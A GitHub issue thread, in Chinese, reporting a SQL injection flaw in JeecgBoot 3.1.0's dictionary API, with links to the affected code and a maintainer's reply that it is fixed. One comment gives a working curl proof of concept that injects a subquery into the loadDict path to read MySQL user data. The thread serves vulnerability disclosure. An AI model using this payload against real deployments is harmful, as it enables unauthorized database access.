字典接口存在SQL注入风险 #3713
Comments
|
我们代码加了过滤,你能执行成功? |
使用以下组件能执行 curl执行 curl 'http://localhost:8080/jeecg-boot/sys/dict/loadDict/mysql.user,user,host,1%3C%3E(select%20user())?_t=1652854810&pageSize=10&keyword=' \
-H 'X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NTI4NDE5MDIsInVzZXJuYW1lIjoiYWRtaW4ifQ.DdvKu-MOvJyEplEr_QYtGGgBahOKrNUZB89g6L1crqQ' \
-H 'X-Sign: 1CAA2D41AA8D48D3FC1C72B6968AE09F' \
-H 'X-TIMESTAMP: 20220518142010' \
--compressed \
--insecure |
|
已经修复,下个版本发 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
版本号:
3.1.0
问题描述:
字典接口存在SQL注入风险
截图&代码:
https://github.com/jeecgboot/jeecg-boot/blob/2e90f73da26992cf1bb8cc4e699d780c45a3c1b2/jeecg-boot/jeecg-boot-module-system/src/main/java/org/jeecg/modules/system/service/impl/SysDictServiceImpl.java#L304-L311
https://github.com/jeecgboot/jeecg-boot/blob/2e90f73da26992cf1bb8cc4e699d780c45a3c1b2/jeecg-boot/jeecg-boot-module-system/src/main/java/org/jeecg/modules/system/mapper/xml/SysDictMapper.xml#L171-L185
The text was updated successfully, but these errors were encountered: